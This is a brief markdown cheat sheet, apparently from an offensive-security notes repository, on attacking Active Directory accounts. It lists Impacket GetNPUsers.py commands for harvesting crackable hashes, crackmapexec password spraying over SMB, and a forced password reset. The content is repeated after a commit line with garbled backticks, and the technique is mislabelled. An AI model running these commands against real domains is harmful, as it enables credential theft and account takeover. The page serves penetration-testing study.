killchain-compendium/enumeration/docs/kerberoast.md

# Kerberoast

## Usage

* Impacket's `GetNPUsers.py` to get Hashes of userlist
```sh
GetNPUsers.py -no-pass <DomainName>/  -usersfile users.txt -format john -outputfile hashes
```

* Use crackmapexec to gain access to further user accounts with the password of the user found with `GetNPUsers.py`
```sh
crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
```
    * Watch out for `STATUS_PASSWORD_MUST_CHANGE`
    * Change password with 
```sh
smbpasswd.py <user>@$TARGET_IP  -newpass password123
```
added rsync enum alternative path 2022-01-09 22:52:39 +01:00			`# Kerberoast`

			`## Usage`

			* Impacket's `GetNPUsers.py` to get Hashes of userlist
			```sh
			`GetNPUsers.py -no-pass <DomainName>/ -usersfile users.txt -format john -outputfile hashes`
			```

			* Use crackmapexec to gain access to further user accounts with the password of the user found with `GetNPUsers.py`
			```sh
			`crackmapexec smb $TARGET_IP -u users.txt -p pass.txt`
			```
			* Watch out for `STATUS_PASSWORD_MUST_CHANGE`
			`* Change password with`
			```sh
			`smbpasswd.py <user>@$TARGET_IP -newpass password123`
			```